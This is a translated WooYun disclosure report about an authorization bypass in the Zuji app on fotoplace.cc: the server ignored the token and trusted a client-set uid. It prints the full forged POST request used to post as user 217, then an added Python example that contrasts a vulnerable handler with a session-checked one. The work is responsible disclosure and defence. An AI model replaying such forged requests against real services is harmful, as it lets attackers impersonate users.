Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0102844

Title: Zuji (足记) app: authorization bypass allows posting content as any user

Vendor: fotoplace.cc

Author: Vern

Submitted: 2015-03-30 13:59

Fixed: 2015-05-14 14:42

Published: 2015-05-14 14:42

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-03-30: Details sent to the vendor; awaiting vendor handling
2015-03-30: Vendor confirmed; details disclosed to the vendor only
2015-04-09: Details disclosed to core white hats and domain experts
2015-04-19: Details disclosed to regular white hats
2015-04-29: Details disclosed to intern white hats
2015-05-14: Details disclosed to the public

Brief description:

Post image and text content with the privileges of any user (one careless move and that "blockbuster movie-still" look goes astray).

Detailed description:

I posted some arbitrary content from the Zuji app myself and captured the request.

[Screenshot: 1.png]

The token is not validated and the id parameter is client-controlled. Change it to the target user's id, 217,
then submit the request:

POST /api2/home%2Fnewpost.php HTTP/1.1
Content-Type: multipart/form-data; boundary=6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Length: 748424
Host: fotoplace.cc
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.3.0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="version"
Content-Type: text/plain; charset=UTF-8
Content-Length: 3
Content-Transfer-Encoding: binary
2.3
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="uid"
Content-Type: text/plain; charset=UTF-8
Content-Length: 7
Content-Transfer-Encoding: binary
217
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="token"
Content-Type: text/plain; charset=UTF-8
Content-Length: 64
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="type"
Content-Type: text/plain; charset=UTF-8
Content-Length: 4
Content-Transfer-Encoding: binary
post
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="photo"; filename="IMG_1426922379498.JPG"
Content-Type:
Content-Length: 745335
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="footprintId"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="syncFootprintToDb"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1
Content-Transfer-Encoding: binary
0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="tags"
Content-Type: text/plain; charset=UTF-8
Content-Length: 2
Content-Transfer-Encoding: binary
[]
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="text"
Content-Type: text/plain; charset=UTF-8
Content-Length: 9
Content-Transfer-Encoding: binary
test by wooyun
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="lat"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1
Content-Transfer-Encoding: binary
0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="lng"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1
Content-Transfer-Encoding: binary
0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="locationName"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="locationAddress"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="locationDesc"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="topicTag"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="activityId"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd--


[Screenshot: 2.png]

Upload successful.

Proof of vulnerability:

[Screenshot: Screenshot_2015-03-21-15-36-59.png]

Fix recommendation:

Validate everything server-side; most of the tokens the app sends currently have no effect.
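As an added example that is neither the vendor's code nor part of the original report, the Python below models the authorization decision described in the detailed description and in the fix recommendation: a minimal parser for the multipart body in the capture, a handler that, like the reported endpoint, takes post ownership from the submitted uid field without consulting the token, and a hardened handler that derives the acting user from a server-side session bound to the token and refuses a uid that disagrees with it. The session table, the placeholder token strings, user id 118 and the boundary string are constructed; only user id 217 comes from the report.

```python
"""Added example (not fotoplace.cc's code): deciding post ownership from the
server-side session instead of the client-supplied uid field.

Everything below is constructed for illustration: the session table, the
placeholder tokens, user id 118 and the multipart boundary. Only user id 217
comes from the report.
"""
import hmac
from typing import Dict, Optional, Tuple

# Constructed server-side session store: token -> uid. In production this is a
# database or cache lookup; the token strings are placeholders, not real tokens.
SESSIONS: Dict[str, int] = {
    "tok-tester-PLACEHOLDER": 118,   # the tester's own account (constructed id)
    "tok-victim-PLACEHOLDER": 217,   # the target account, id 217 as in the report
}

Result = Tuple[int, Optional[dict]]   # (HTTP-style status, stored post or None)


def build_body(fields: Dict[str, str], boundary: str) -> bytes:
    """Encode text fields as multipart/form-data in the shape of the captured
    request: one part per field, closing boundary at the end."""
    out = bytearray()
    for name, value in fields.items():
        out += (f"--{boundary}\r\n"
                f'Content-Disposition: form-data; name="{name}"\r\n'
                f"Content-Type: text/plain; charset=UTF-8\r\n\r\n"
                f"{value}\r\n").encode()
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: maps each part's name to its raw value.
    Sufficient for the text parts in the capture; not a full RFC 7578 parser."""
    fields: Dict[str, bytes] = {}
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":      # leading empty piece / closing "--"
            continue
        headers, _, value = chunk.partition(b"\r\n\r\n")
        name = None
        for line in headers.split(b"\r\n"):
            if line.lower().startswith(b"content-disposition:"):
                for param in line.split(b";"):
                    param = param.strip()
                    if param.startswith(b'name="') and param.endswith(b'"'):
                        name = param[6:-1].decode()
        if name is not None:
            fields[name] = value
    return fields


def resolve_uid(token: str, sessions: Dict[str, int] = SESSIONS) -> Optional[int]:
    """Look the token up in the session store using a constant-time comparison."""
    for known, uid in sessions.items():
        if hmac.compare_digest(known.encode(), token.encode()):
            return uid
    return None


def newpost_vulnerable(fields: Dict[str, bytes]) -> Result:
    """Models the behaviour the report describes: the uid field alone decides
    whose post this is, and the token part is never consulted."""
    post = {"uid": int(fields["uid"]), "text": fields.get("text", b"").decode()}
    return 200, post


def newpost_hardened(fields: Dict[str, bytes],
                     sessions: Dict[str, int] = SESSIONS) -> Result:
    """The acting user comes from the session bound to the token. The submitted
    uid is never used for ownership; if it disagrees with the session the
    request is refused, which is also the event worth logging and alerting on."""
    uid = resolve_uid(fields.get("token", b"").decode(), sessions)
    if uid is None:
        return 401, None                     # missing or unknown token
    claimed = fields.get("uid", b"").decode()
    if claimed and claimed != str(uid):
        return 403, None                     # uid/token mismatch: log this
    post = {"uid": uid, "text": fields.get("text", b"").decode()}
    return 200, post


def demo() -> Dict[str, Result]:
    """Replay the report's scenario against both handlers: the tester's own
    token with the uid field rewritten to the target id 217."""
    boundary = "constructed-boundary"
    forged = parse_multipart(build_body({
        "version": "2.3", "uid": "217", "token": "tok-tester-PLACEHOLDER",
        "type": "post", "text": "test by wooyun",
    }, boundary), boundary)
    honest = dict(forged, uid=b"118")
    return {
        "vulnerable_forged": newpost_vulnerable(forged),   # (200, post owned by 217)
        "hardened_forged": newpost_hardened(forged),       # (403, None)
        "hardened_honest": newpost_hardened(honest),       # (200, post owned by 118)
        "hardened_no_token": newpost_hardened(dict(forged, token=b"")),  # (401, None)
    }


if __name__ == "__main__":
    for case, (status, post) in demo().items():
        print(f"{case}: {status} {post}")
```

The design point is that the uid field is at most a hint the server can cross-check; the identity that owns the post must be whatever the session store says the token maps to. A mismatch between the two is not a benign client bug but exactly the signal the report's attack produces, so the hardened handler refuses it with a distinct status rather than silently correcting it.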

Copyright notice: when reposting, credit the source: Vern@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-03-30 14:40

Vendor reply:

Thanks, Vern

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-03-21 18:26 | 爱上平顶山, certified white hat ( core white hat | Rank: 2738, vulnerabilities: 547 | [no hat] a wanderer far from home; formerly worked at a certain agency in the Celestial Empire. IT...)

    Error establishing a database connection... They've already ended up like this...